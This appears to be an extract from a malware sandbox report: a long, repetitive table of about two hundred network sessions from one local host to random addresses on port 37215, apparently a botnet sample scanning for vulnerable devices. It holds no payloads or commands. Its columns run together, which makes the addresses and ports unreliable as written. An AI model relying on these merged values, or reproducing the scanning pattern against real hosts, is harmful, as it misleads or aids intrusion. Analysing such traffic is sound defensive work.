                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9513192.168.2.154649441.234.163.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9514192.168.2.153851241.205.240.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9515192.168.2.153726241.90.109.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9516192.168.2.155849641.103.113.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9517192.168.2.154990441.191.83.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9518192.168.2.154016241.188.113.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9519192.168.2.154442841.71.65.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9520192.168.2.155009641.167.175.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9521192.168.2.155721241.254.252.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9522192.168.2.155043841.104.41.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9523192.168.2.154966641.116.101.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9524192.168.2.154893441.1.140.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9525192.168.2.154860241.152.145.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9526192.168.2.155585041.116.27.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9527192.168.2.155911441.86.169.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9528192.168.2.155848641.239.245.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9529192.168.2.155087841.249.136.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9530192.168.2.155597041.205.220.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9531192.168.2.155555641.184.227.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9532192.168.2.154749841.201.109.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9533192.168.2.154759641.47.242.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9534192.168.2.156055441.223.27.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9535192.168.2.153833441.155.132.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9536192.168.2.154404641.244.38.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9537192.168.2.154921041.50.178.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9538192.168.2.154413041.71.38.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9539192.168.2.155994441.111.146.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9540192.168.2.154706041.45.180.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9541192.168.2.155958841.158.229.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9542192.168.2.154914441.234.109.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9543192.168.2.155176041.50.134.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9544192.168.2.155879641.1.134.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9545192.168.2.155417641.84.178.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9546192.168.2.153585841.31.148.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9547192.168.2.153607441.69.218.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9548192.168.2.153609841.65.122.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9549192.168.2.154188041.16.31.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9550192.168.2.153844041.167.234.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9551192.168.2.154137641.23.5.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9552192.168.2.155357641.68.167.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9553192.168.2.154273041.62.64.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9554192.168.2.153989041.225.149.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9555192.168.2.155901241.203.156.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9556192.168.2.153380241.20.230.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9557192.168.2.154321041.202.230.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9558192.168.2.154347241.127.156.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9559192.168.2.155108041.109.30.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9560192.168.2.153377641.255.172.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9561192.168.2.153345041.61.47.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9562192.168.2.153939241.255.223.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9563192.168.2.154860441.126.85.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9564192.168.2.154570041.53.247.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9565192.168.2.154697041.120.56.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9566192.168.2.155329041.52.143.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9567192.168.2.154699441.72.21.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9568192.168.2.154439441.102.134.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9569192.168.2.154071641.174.75.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9570192.168.2.154965841.251.189.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9571192.168.2.153383841.191.249.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9572192.168.2.154329241.180.154.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9573192.168.2.154793041.0.197.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9574192.168.2.153488641.222.105.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9575192.168.2.154059441.57.191.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9576192.168.2.155820841.182.132.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9577192.168.2.154621441.220.43.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9578192.168.2.155949641.158.57.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9579192.168.2.154027041.236.152.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9580192.168.2.155643041.14.108.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9581192.168.2.154180041.233.226.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9582192.168.2.154055841.74.61.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9583192.168.2.155744041.71.169.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9584192.168.2.154869841.89.4.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9585192.168.2.155880441.189.126.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9586192.168.2.156008041.253.58.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9587192.168.2.154282841.164.78.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9588192.168.2.153574241.67.174.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9589192.168.2.153531041.132.57.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9590192.168.2.155782241.36.21.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9591192.168.2.155572241.8.1.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9592192.168.2.155859241.157.111.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9593192.168.2.153777241.180.117.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9594192.168.2.154604441.34.215.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9595192.168.2.154252641.172.139.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9596192.168.2.153844841.74.190.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9597192.168.2.155415641.72.27.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9598192.168.2.155544441.115.128.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9599192.168.2.155764241.57.225.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9600192.168.2.155551241.10.249.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9601192.168.2.154521441.62.126.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9602192.168.2.154740441.137.188.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9603192.168.2.155171441.238.237.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9604192.168.2.155867641.249.29.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9605192.168.2.156010241.111.254.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9606192.168.2.153330041.114.61.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9607192.168.2.156096841.209.136.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9608192.168.2.155924441.47.152.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9609192.168.2.153628241.76.46.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9610192.168.2.154667241.231.195.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9611192.168.2.155245041.233.76.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9612192.168.2.155846641.151.50.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9613192.168.2.154693441.169.61.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9614192.168.2.155384441.15.86.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9615192.168.2.154561241.224.12.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9616192.168.2.154384841.106.22.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9617192.168.2.153939241.105.141.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9618192.168.2.155413641.233.106.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9619192.168.2.155095841.3.144.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9620192.168.2.155602441.241.177.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9621192.168.2.153952441.152.113.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9622192.168.2.154635841.246.133.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9623192.168.2.154452841.116.148.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9624192.168.2.155332441.132.117.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9625192.168.2.154107441.152.193.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9626192.168.2.155279041.132.138.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9627192.168.2.153632841.123.169.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9628192.168.2.155835041.232.5.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9629192.168.2.155853841.178.239.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9630192.168.2.155185641.121.47.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9631192.168.2.154864241.135.197.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9632192.168.2.153828441.161.70.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9633192.168.2.153642241.205.134.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9634192.168.2.155715441.100.241.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9635192.168.2.155504841.250.175.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9636192.168.2.154270441.78.147.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9637192.168.2.155363841.144.81.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9638192.168.2.155955041.61.85.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9639192.168.2.155646441.161.13.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9640192.168.2.154535441.42.143.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9641192.168.2.155332241.175.236.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9642192.168.2.153525441.2.239.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9643192.168.2.153515641.200.233.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9644192.168.2.155824441.2.57.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9645192.168.2.154870441.215.168.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9646192.168.2.153906841.203.8.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9647192.168.2.155668241.23.61.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9648192.168.2.155402841.51.86.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9649192.168.2.153962441.12.33.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9650192.168.2.154628841.212.208.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9651192.168.2.154215641.38.94.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9652192.168.2.155654241.63.188.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9653192.168.2.153390241.87.203.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9654192.168.2.154253041.207.44.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9655192.168.2.154680041.32.226.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9656192.168.2.153680641.75.179.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9657192.168.2.153534241.38.194.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9658192.168.2.153504641.247.205.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9659192.168.2.153486841.166.14.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9660192.168.2.154053641.183.150.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9661192.168.2.154283041.149.91.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9662192.168.2.154573841.72.35.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9663192.168.2.153572641.112.125.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9664192.168.2.155516841.108.26.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9665192.168.2.153826041.173.143.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9666192.168.2.154278241.107.134.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9667192.168.2.154140841.175.202.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9668192.168.2.155241841.221.202.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9669192.168.2.154082241.21.51.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9670192.168.2.154052841.141.119.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9671192.168.2.153630241.246.42.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9672192.168.2.153333441.40.87.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9673192.168.2.155675041.228.224.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9674192.168.2.154071841.56.4.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9675192.168.2.154938041.1.127.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9676192.168.2.154814841.49.106.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9677192.168.2.153507441.200.99.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9678192.168.2.155597641.150.22.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9679192.168.2.153952641.150.79.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9680192.168.2.156002241.116.144.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9681192.168.2.153619441.177.58.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9682192.168.2.155041441.53.219.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9683192.168.2.153799441.51.144.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9684192.168.2.154194041.71.68.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9685192.168.2.154403841.247.166.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9686192.168.2.154378841.249.212.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9687192.168.2.154368641.129.118.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9688192.168.2.154848041.136.93.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9689192.168.2.155233841.32.57.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9690192.168.2.155652441.148.196.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9691192.168.2.154947841.193.141.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9692192.168.2.154845441.3.129.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9693192.168.2.154924041.45.77.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9694192.168.2.154328241.127.131.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9695192.168.2.154323241.146.163.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9696192.168.2.155657241.86.19.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9697192.168.2.155667841.246.62.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9698192.168.2.154648441.209.0.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9699192.168.2.155181241.104.222.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9700192.168.2.155638441.139.43.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9701192.168.2.153548441.110.138.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9702192.168.2.154004641.118.175.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9703192.168.2.154498041.103.159.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9704192.168.2.155684441.179.255.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9705192.168.2.156060241.85.94.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9706192.168.2.155552241.192.227.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9707192.168.2.154714241.128.30.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9708192.168.2.154679841.171.111.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9709192.168.2.154668641.162.91.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9710192.168.2.153807241.29.136.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9711192.168.2.154698841.160.101.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9712192.168.2.153560641.21.56.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9713192.168.2.155731641.55.26.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9714192.168.2.155624841.210.81.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9715192.168.2.153483641.77.97.9837215
